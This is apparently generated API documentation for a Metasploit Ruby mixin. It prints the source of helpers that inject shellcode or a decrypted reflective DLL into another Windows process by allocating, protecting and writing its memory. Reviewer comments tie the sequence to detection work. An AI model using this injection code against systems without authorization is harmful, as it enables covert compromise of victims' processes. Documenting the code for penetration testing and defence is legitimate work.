<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>
Module: Msf::Post::Windows::ReflectiveDLLInjection
&mdash; Documentation by YARD 0.9.37
</title>
<link rel="stylesheet" href="../../../css/style.css" type="text/css" />
<link rel="stylesheet" href="../../../css/common.css" type="text/css" />
<script type="text/javascript">
pathId = "Msf::Post::Windows::ReflectiveDLLInjection";
relpath = '../../../';
</script>
<script type="text/javascript" charset="utf-8" src="../../../js/jquery.js"></script>
<script type="text/javascript" charset="utf-8" src="../../../js/app.js"></script>
</head>
<body>
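<div class="nav_wrap">
<!-- Navigation frame loaded from a relative (same-origin) URL; the title gives assistive technology a name for it. -->
<iframe id="nav" src="../../../class_list.html?1" title="Class list navigation"></iframe>
<div id="resizer"></div>
</div>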
<div id="main" tabindex="-1">
<div id="header">
<div id="menu">
<a href="../../../_index.html">Index (R)</a> &raquo;
<span class='title'><span class='object_link'><a href="../../../Msf.html" title="Msf (module)">Msf</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../../Post.html" title="Msf::Post (class)">Post</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../Windows.html" title="Msf::Post::Windows (module)">Windows</a></span></span>
&raquo;
<span class="title">ReflectiveDLLInjection</span>
</div>
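<div id="search">
<!-- Icon-only link: aria-label supplies the accessible name, and the decorative SVG is hidden from assistive technology. -->
<a class="full_list_link" id="class_list_link"
href="../../../class_list.html" aria-label="Class list">
<svg width="24" height="24" aria-hidden="true">
<rect x="0" y="4" width="24" height="4" rx="1" ry="1"></rect>
<rect x="0" y="12" width="24" height="4" rx="1" ry="1"></rect>
<rect x="0" y="20" width="24" height="4" rx="1" ry="1"></rect>
</svg>
</a>
</div>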
<div class="clear"></div>
</div>
<div id="content"><h1>Module: Msf::Post::Windows::ReflectiveDLLInjection
</h1>
<div class="box_info">
<dl>
<dt>Includes:</dt>
<dd><span class='object_link'><a href="../../ReflectiveDLLLoader.html" title="Msf::ReflectiveDLLLoader (module)">ReflectiveDLLLoader</a></span></dd>
</dl>
<dl>
<dt>Included in:</dt>
<dd><span class='object_link'><a href="Process.html" title="Msf::Post::Windows::Process (module)">Process</a></span></dd>
</dl>
<dl>
<dt>Defined in:</dt>
<dd>lib/msf/core/post/windows/reflective_dll_injection.rb</dd>
</dl>
</div>
<h2>Overview</h2><div class="docstring">
<div class="discussion">
<p>This module exposes functionality that makes it easier to perform Reflective DLL Injection into processes on a victim's machine.</p>
</div>
</div>
<div class="tags">
</div>
<h2>
Constant Summary
<small><a href="#" class="constants_summary_toggle">collapse</a></small>
</h2>
<dl class="constants">
<dt id="PAGE_ALIGN-constant" class="">PAGE_ALIGN =
</dt>
<dd><pre class="code"><span class='int'>1024</span></pre></dd>
</dl>
<h3 class="inherited">Constants included
from <span class='object_link'><a href="../../ReflectiveDLLLoader.html" title="Msf::ReflectiveDLLLoader (module)">ReflectiveDLLLoader</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../../ReflectiveDLLLoader.html#EXPORT_REFLECTIVELOADER-constant" title="Msf::ReflectiveDLLLoader::EXPORT_REFLECTIVELOADER (constant)">ReflectiveDLLLoader::EXPORT_REFLECTIVELOADER</a></span></p>
<h2>
Instance Method Summary
<small><a href="#" class="summary_toggle">collapse</a></small>
</h2>
<ul class="summary">
<li class="public ">
<span class="summary_signature">
<a href="#initialize-instance_method" title="#initialize (instance method)">#<strong>initialize</strong>(info = {}) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'></div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#inject_dll_data_into_process-instance_method" title="#inject_dll_data_into_process (instance method)">#<strong>inject_dll_data_into_process</strong>(process, dll_data, loader_name: &#39;ReflectiveLoader&#39;, loader_ordinal: EXPORT_REFLECTIVELOADER) &#x21d2; Array </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Inject a reflectively-injectable DLL into the given process using reflective injection.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#inject_dll_into_process-instance_method" title="#inject_dll_into_process (instance method)">#<strong>inject_dll_into_process</strong>(process, dll_path, loader_name: &#39;ReflectiveLoader&#39;, loader_ordinal: EXPORT_REFLECTIVELOADER) &#x21d2; Array </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Inject a reflectively-injectable DLL into the given process using reflective injection.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#inject_into_process-instance_method" title="#inject_into_process (instance method)">#<strong>inject_into_process</strong>(process, shellcode) &#x21d2; Integer </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Inject the given shellcode into a target process.</p>
</div></span>
</li>
</ul>
<h3 class="inherited">Methods included from <span class='object_link'><a href="../../ReflectiveDLLLoader.html" title="Msf::ReflectiveDLLLoader (module)">ReflectiveDLLLoader</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../../ReflectiveDLLLoader.html#load_rdi_dll-instance_method" title="Msf::ReflectiveDLLLoader#load_rdi_dll (method)">#load_rdi_dll</a></span>, <span class='object_link'><a href="../../ReflectiveDLLLoader.html#load_rdi_dll_from_data-instance_method" title="Msf::ReflectiveDLLLoader#load_rdi_dll_from_data (method)">#load_rdi_dll_from_data</a></span></p>
<div id="instance_method_details" class="method_details_list">
<h2>Instance Method Details</h2>
<div class="method_details first">
<h3 class="signature first" id="initialize-instance_method">
#<strong>initialize</strong>(info = {}) &#x21d2; <tt>Object</tt>
</h3><table class="source_code">
<!--
  Listing: initialize(info = {}).
  Merges a 'Compat' => 'Meterpreter' => 'Commands' entry into the module info via update_info
  and hands the result to super. The three commands listed (memory allocate, protect, write)
  line up with the three process.memory calls made by inject_into_process on this page.
  NOTE(review): presumably the framework uses this list to check that a session supports the
  commands before the mixin is used; confirm against the framework's Compat handling.
-->
<tr>
<td>
<pre class="lines">
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/post/windows/reflective_dll_injection.rb', line 16</span>
<span class='kw'>def</span> <span class='id identifier rubyid_initialize'>initialize</span><span class='lparen'>(</span><span class='id identifier rubyid_info'>info</span> <span class='op'>=</span> <span class='lbrace'>{</span><span class='rbrace'>}</span><span class='rparen'>)</span>
<span class='kw'>super</span><span class='lparen'>(</span>
<span class='id identifier rubyid_update_info'>update_info</span><span class='lparen'>(</span>
<span class='id identifier rubyid_info'>info</span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Compat</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='lbrace'>{</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Meterpreter</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='lbrace'>{</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Commands</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='qwords_beg'>%w[</span><span class='words_sep'>
</span><span class='tstring_content'>stdapi_sys_process_memory_allocate</span><span class='words_sep'>
</span><span class='tstring_content'>stdapi_sys_process_memory_protect</span><span class='words_sep'>
</span><span class='tstring_content'>stdapi_sys_process_memory_write</span><span class='words_sep'>
</span><span class='tstring_end'>]</span></span>
<span class='rbrace'>}</span>
<span class='rbrace'>}</span>
<span class='rparen'>)</span>
<span class='rparen'>)</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="inject_dll_data_into_process-instance_method">
#<strong>inject_dll_data_into_process</strong>(process, dll_data, loader_name: &#39;ReflectiveLoader&#39;, loader_ordinal: EXPORT_REFLECTIVELOADER) &#x21d2; <tt>Array</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Inject a reflectively-injectable DLL, supplied as in-memory data, into the given process using reflective injection.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>process</span>
<span class='type'>(<tt><span class='object_link'><a href="../../../Rex/Post/Meterpreter/Extensions/Stdapi/Sys/Process.html" title="Rex::Post::Meterpreter::Extensions::Stdapi::Sys::Process (class)">Rex::Post::Meterpreter::Extensions::Stdapi::Sys::Process</a></span></tt>)</span>
&mdash;
<div class='inline'>
<p>The process to inject the DLL into.</p>
</div>
</li>
<li>
<span class='name'>dll_data</span>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
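<p>The DLL contents to be loaded and injected. The value is passed to <code>::MetasploitPayloads::Crypto.decrypt</code> (as <code>ciphertext:</code>) before it is loaded.</p>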
</div>
</li>
</ul>
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>Array</tt>)</span>
&mdash;
<div class='inline'>
<p>Tuple of allocated memory address and offset to the <code>ReflectiveLoader</code> function.</p>
</div>
</li>
</ul>
</div><table class="source_code">
<!--
  Listing: inject_dll_data_into_process.
  dll_data is first passed to ::MetasploitPayloads::Crypto.decrypt as ciphertext:, and the
  decrypted result is what load_rdi_dll_from_data inspects and what inject_into_process writes.
  The image placed in the target process is therefore the decrypted one, whatever form
  dll_data had when it was passed in.
  Returns [dll_mem, offset]: the address returned by inject_into_process and the loader offset
  returned by load_rdi_dll_from_data. Nothing in this listing starts execution at that offset.
  NOTE(review): how decrypt treats input that is not encrypted is not shown here; confirm.
-->
<tr>
<td>
<pre class="lines">
80
81
82
83
84
85
86</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/post/windows/reflective_dll_injection.rb', line 80</span>
<span class='kw'>def</span> <span class='id identifier rubyid_inject_dll_data_into_process'>inject_dll_data_into_process</span><span class='lparen'>(</span><span class='id identifier rubyid_process'>process</span><span class='comma'>,</span> <span class='id identifier rubyid_dll_data'>dll_data</span><span class='comma'>,</span> <span class='label'>loader_name:</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>ReflectiveLoader</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='label'>loader_ordinal:</span> <span class='const'><span class='object_link'><a href="../../ReflectiveDLLLoader.html#EXPORT_REFLECTIVELOADER-constant" title="Msf::ReflectiveDLLLoader::EXPORT_REFLECTIVELOADER (constant)">EXPORT_REFLECTIVELOADER</a></span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_decrypted_dll_data'>decrypted_dll_data</span> <span class='op'>=</span> <span class='op'>::</span><span class='const'>MetasploitPayloads</span><span class='op'>::</span><span class='const'>Crypto</span><span class='period'>.</span><span class='id identifier rubyid_decrypt'>decrypt</span><span class='lparen'>(</span><span class='label'>ciphertext:</span> <span class='id identifier rubyid_dll_data'>dll_data</span><span class='rparen'>)</span>
<span class='id identifier rubyid_offset'>offset</span> <span class='op'>=</span> <span class='id identifier rubyid_load_rdi_dll_from_data'>load_rdi_dll_from_data</span><span class='lparen'>(</span><span class='id identifier rubyid_decrypted_dll_data'>decrypted_dll_data</span><span class='comma'>,</span> <span class='label'>loader_name:</span> <span class='id identifier rubyid_loader_name'>loader_name</span><span class='comma'>,</span> <span class='label'>loader_ordinal:</span> <span class='id identifier rubyid_loader_ordinal'>loader_ordinal</span><span class='rparen'>)</span>
<span class='id identifier rubyid_dll_mem'>dll_mem</span> <span class='op'>=</span> <span class='id identifier rubyid_inject_into_process'>inject_into_process</span><span class='lparen'>(</span><span class='id identifier rubyid_process'>process</span><span class='comma'>,</span> <span class='id identifier rubyid_decrypted_dll_data'>decrypted_dll_data</span><span class='rparen'>)</span>
<span class='kw'>return</span> <span class='id identifier rubyid_dll_mem'>dll_mem</span><span class='comma'>,</span> <span class='id identifier rubyid_offset'>offset</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="inject_dll_into_process-instance_method">
#<strong>inject_dll_into_process</strong>(process, dll_path, loader_name: &#39;ReflectiveLoader&#39;, loader_ordinal: EXPORT_REFLECTIVELOADER) &#x21d2; <tt>Array</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Inject a reflectively-injectable DLL, read from the given file path, into the given process using reflective injection.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>process</span>
<span class='type'>(<tt><span class='object_link'><a href="../../../Rex/Post/Meterpreter/Extensions/Stdapi/Sys/Process.html" title="Rex::Post::Meterpreter::Extensions::Stdapi::Sys::Process (class)">Rex::Post::Meterpreter::Extensions::Stdapi::Sys::Process</a></span></tt>)</span>
&mdash;
<div class='inline'>
<p>The process to inject the DLL into.</p>
</div>
</li>
<li>
<span class='name'>dll_path</span>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>Path to the DLL that is to be loaded and injected.</p>
</div>
</li>
</ul>
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>Array</tt>)</span>
&mdash;
<div class='inline'>
<p>Tuple of allocated memory address and offset to the <code>ReflectiveLoader</code> function.</p>
</div>
</li>
</ul>
</div><table class="source_code">
<!--
  Listing: inject_dll_into_process.
  load_rdi_dll(dll_path, ...) supplies both the DLL bytes and the loader offset; the bytes are
  then written into the target process by inject_into_process.
  Returns [dll_mem, offset]: the address returned by inject_into_process and the loader offset
  returned by load_rdi_dll. Nothing in this listing starts execution at that offset.
  NOTE(review): no decrypt call appears in this listing, unlike inject_dll_data_into_process;
  whether load_rdi_dll decrypts internally is not shown here. Confirm.
-->
<tr>
<td>
<pre class="lines">
64
65
66
67
68
69</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/post/windows/reflective_dll_injection.rb', line 64</span>
<span class='kw'>def</span> <span class='id identifier rubyid_inject_dll_into_process'>inject_dll_into_process</span><span class='lparen'>(</span><span class='id identifier rubyid_process'>process</span><span class='comma'>,</span> <span class='id identifier rubyid_dll_path'>dll_path</span><span class='comma'>,</span> <span class='label'>loader_name:</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>ReflectiveLoader</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='label'>loader_ordinal:</span> <span class='const'><span class='object_link'><a href="../../ReflectiveDLLLoader.html#EXPORT_REFLECTIVELOADER-constant" title="Msf::ReflectiveDLLLoader::EXPORT_REFLECTIVELOADER (constant)">EXPORT_REFLECTIVELOADER</a></span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_dll'>dll</span><span class='comma'>,</span> <span class='id identifier rubyid_offset'>offset</span> <span class='op'>=</span> <span class='id identifier rubyid_load_rdi_dll'>load_rdi_dll</span><span class='lparen'>(</span><span class='id identifier rubyid_dll_path'>dll_path</span><span class='comma'>,</span> <span class='label'>loader_name:</span> <span class='id identifier rubyid_loader_name'>loader_name</span><span class='comma'>,</span> <span class='label'>loader_ordinal:</span> <span class='id identifier rubyid_loader_ordinal'>loader_ordinal</span><span class='rparen'>)</span>
<span class='id identifier rubyid_dll_mem'>dll_mem</span> <span class='op'>=</span> <span class='id identifier rubyid_inject_into_process'>inject_into_process</span><span class='lparen'>(</span><span class='id identifier rubyid_process'>process</span><span class='comma'>,</span> <span class='id identifier rubyid_dll'>dll</span><span class='rparen'>)</span>
<span class='kw'>return</span> <span class='id identifier rubyid_dll_mem'>dll_mem</span><span class='comma'>,</span> <span class='id identifier rubyid_offset'>offset</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="inject_into_process-instance_method">
#<strong>inject_into_process</strong>(process, shellcode) &#x21d2; <tt>Integer</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Inject the given shellcode into a target process.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>process</span>
<span class='type'>(<tt><span class='object_link'><a href="../../../Rex/Post/Meterpreter/Extensions/Stdapi/Sys/Process.html" title="Rex::Post::Meterpreter::Extensions::Stdapi::Sys::Process (class)">Rex::Post::Meterpreter::Extensions::Stdapi::Sys::Process</a></span></tt>)</span>
&mdash;
<div class='inline'>
<p>The process to inject the shellcode into.</p>
</div>
</li>
<li>
<span class='name'>shellcode</span>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>The shellcode to inject.</p>
</div>
</li>
</ul>
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>Integer</tt>)</span>
&mdash;
<div class='inline'>
<p>Address of the shellcode in the target process's memory.</p>
</div>
</li>
</ul>
</div><table class="source_code">
<!--
  Listing: inject_into_process.
  1. shellcode_size starts as shellcode.length and, when that is not already a multiple of
     PAGE_ALIGN (1024 on this page), is rounded up to the next multiple.
  2. process.memory.allocate(shellcode_size) allocates the buffer through the process object.
  3. process.memory.protect(shellcode_mem) is called with the address only; no length or
     protection value is passed, so the resulting permissions come from that API's defaults.
  4. process.memory.write copies the unpadded shellcode into the buffer, and the buffer address
     is returned.
  NOTE(review): PAGE_ALIGN is 1024, smaller than the 4 KiB page size usual on Windows, so it acts
  as a rounding granule rather than a true page size; presumably the OS rounds the allocation up
  further. Confirm.
  NOTE(review): for detection work, the allocate, protect, write sequence against another process
  corresponds to the three stdapi_sys_process_memory_* commands declared in initialize.
-->
<tr>
<td>
<pre class="lines">
41
42
43
44
45
46
47
48
49
50
51
52
53</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/post/windows/reflective_dll_injection.rb', line 41</span>
<span class='kw'>def</span> <span class='id identifier rubyid_inject_into_process'>inject_into_process</span><span class='lparen'>(</span><span class='id identifier rubyid_process'>process</span><span class='comma'>,</span> <span class='id identifier rubyid_shellcode'>shellcode</span><span class='rparen'>)</span>
<span class='id identifier rubyid_shellcode_size'>shellcode_size</span> <span class='op'>=</span> <span class='id identifier rubyid_shellcode'>shellcode</span><span class='period'>.</span><span class='id identifier rubyid_length'>length</span>
<span class='kw'>unless</span> <span class='id identifier rubyid_shellcode'>shellcode</span><span class='period'>.</span><span class='id identifier rubyid_length'>length</span> <span class='op'>%</span> <span class='const'><span class='object_link'><a href="#PAGE_ALIGN-constant" title="Msf::Post::Windows::ReflectiveDLLInjection::PAGE_ALIGN (constant)">PAGE_ALIGN</a></span></span> <span class='op'>==</span> <span class='int'>0</span>
<span class='id identifier rubyid_shellcode_size'>shellcode_size</span> <span class='op'>+=</span> <span class='const'><span class='object_link'><a href="#PAGE_ALIGN-constant" title="Msf::Post::Windows::ReflectiveDLLInjection::PAGE_ALIGN (constant)">PAGE_ALIGN</a></span></span> <span class='op'>-</span> <span class='lparen'>(</span><span class='id identifier rubyid_shellcode'>shellcode</span><span class='period'>.</span><span class='id identifier rubyid_length'>length</span> <span class='op'>%</span> <span class='const'><span class='object_link'><a href="#PAGE_ALIGN-constant" title="Msf::Post::Windows::ReflectiveDLLInjection::PAGE_ALIGN (constant)">PAGE_ALIGN</a></span></span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_shellcode_mem'>shellcode_mem</span> <span class='op'>=</span> <span class='id identifier rubyid_process'>process</span><span class='period'>.</span><span class='id identifier rubyid_memory'>memory</span><span class='period'>.</span><span class='id identifier rubyid_allocate'>allocate</span><span class='lparen'>(</span><span class='id identifier rubyid_shellcode_size'>shellcode_size</span><span class='rparen'>)</span>
<span class='id identifier rubyid_process'>process</span><span class='period'>.</span><span class='id identifier rubyid_memory'>memory</span><span class='period'>.</span><span class='id identifier rubyid_protect'>protect</span><span class='lparen'>(</span><span class='id identifier rubyid_shellcode_mem'>shellcode_mem</span><span class='rparen'>)</span>
<span class='id identifier rubyid_process'>process</span><span class='period'>.</span><span class='id identifier rubyid_memory'>memory</span><span class='period'>.</span><span class='id identifier rubyid_write'>write</span><span class='lparen'>(</span><span class='id identifier rubyid_shellcode_mem'>shellcode_mem</span><span class='comma'>,</span> <span class='id identifier rubyid_shellcode'>shellcode</span><span class='rparen'>)</span>
<span class='kw'>return</span> <span class='id identifier rubyid_shellcode_mem'>shellcode_mem</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
</div>
</div>
<div id="footer">
Generated on Fri May 8 17:02:37 2026 by
<a href="https://yardoc.org" title="Yay! A Ruby Documentation Tool" target="_parent">yard</a>
0.9.37 (ruby-3.1.5).
</div>
</div>
</body>
</html>